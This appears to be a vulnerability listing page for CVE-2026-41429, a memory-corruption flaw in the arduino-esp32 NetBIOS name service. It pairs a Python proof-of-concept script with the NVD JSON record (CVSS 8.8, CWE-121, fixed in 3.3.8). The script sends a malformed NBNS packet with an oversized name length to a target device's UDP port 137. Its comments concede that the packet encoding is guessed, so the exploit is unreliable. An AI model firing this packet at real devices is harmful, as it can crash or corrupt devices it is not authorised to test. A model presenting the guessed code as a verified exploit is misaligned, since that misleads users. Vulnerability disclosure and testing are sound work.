CVE-2026-41429

import socket import struct # Proof of Concept for CVE-2026-41429 # Target: arduino-esp32 device with NBNS enabled on UDP port 137 target_ip = "192.168.1.100" # Replace with target IP target_port = 137 # Construct a malicious NBNS packet # NBNS header (Transaction ID, Flags, Questions, Answer RRs, Authority RRs, Additional RRs) # We focus on the Question part where the Name Length is manipulated. # Standard NBNS Name encoding: Length byte followed by labels. # Malicious packet structure: # Header (12 bytes) + Question Name (variable, manipulated length) + Type (2) + Class (2) transaction_id = 0x1234 flags = 0x0110 # Standard query questions = 1 answer_rrs = 0 authority_rrs = 0 additional_rrs = 0 header = struct.pack("!HHHHHH", transaction_id, flags, questions, answer_rrs, authority_rrs, additional_rrs) # Malformed Name: Excessive length byte (e.g., 0xFF) to trigger buffer overflow # The vulnerability lies in trusting this length byte without bounds checking. # Real NBNS names are encoded differently, but the core issue is the length field. # Here we simulate a packet with a large length field to trigger the corruption. # Creating a payload with a length byte that exceeds the buffer size # Assuming the bug is triggered by a large length in the label field. encoded_name = b'\xFF' + b'A' * 63 # Length byte 255 followed by padding type_qtype = 0x0020 # NB (NetBIOS General Name Service) qclass = 0x0001 # IN (Internet) payload = header + encoded_name + struct.pack("!HH", type_qtype, qclass) print(f"Sending malicious packet to {target_ip}:{target_port}...") sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload, (target_ip, target_port)) sock.close() print("Packet sent.")

{"cve": {"id": "CVE-2026-41429", "sourceIdentifier": "[email protected]", "published": "2026-04-24T20:16:27.663", "lastModified": "2026-05-05T18:12:04.277", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "arduino-esp32 is an Arduino core for the ESP32, ESP32-S2, ESP32-S3, ESP32-C3, ESP32-C6 and ESP32-H2 microcontrollers. Prior to 3.3.8, there is a remotely reachable memory corruption issue in the NBNS packet handling path. When NetBIOS is enabled by calling NBNS.begin(...), the device listens on UDP port 137 and processes untrusted NBNS requests from the local network.\nThe request parser trusts the attacker-controlled name_len field without enforcing a bound consistent with the fixed-size destination buffers used later in the flow. This vulnerability is fixed in 3.3.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:espressif:arduino-esp32:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.3.8", "matchCriteriaId": "35B2A78F-D184-4C35-B453-38DBAC30D614"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:espressif:esp32:-:*:*:*:*:*:*:*", "matchCriteriaId": "D1024B06-380B-4116-B7F9-A21A03534B0C"}, {"vulnerable": false, "criteria": "cpe:2.3:h:espressif:esp32-c3:-:*:*:*:*:*:*:*", "matchCriteriaId": "6E01D235-2366-44F4-B671-4AE031802CC2"}, {"vulnerable": false, "criteria": "cpe:2.3:h:espressif:esp32-c6:-:*:*:*:*:*:*:*", "matchCriteriaId": "6D53A06B-8672-49C0-A6CF-426C13197C76"}, {"vulnerable": false, "criteria": "cpe:2.3:h:espressif:esp32-h2:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D656CC6-B68D-4057-8E62-3DA86F123BF7"}, {"vulnerable": false, "criteria": "cpe:2.3:h:espressif:esp32-s2:-:*:*:*:*:*:*:*", "matchCriteriaId": "59AC37EB-FABC-459C-8044-A8E2CDBD0555"}, {"vulnerable": false, "criteria": "cpe:2.3:h:espressif:esp32-s3:-:*:*:*:*:*:*:*", "matchCriteriaId": "50DFAAD7-E08D-4397-BE9A-6EC44EE0624A"}]}]}], "references": [{"url": "https://github.com/espressif/arduino-esp32/security/advisories/GHSA-92j9-c75g-2c5f", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/espressif/arduino-esp32/security/advisories/GHSA-92j9-c75g-2c5f", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}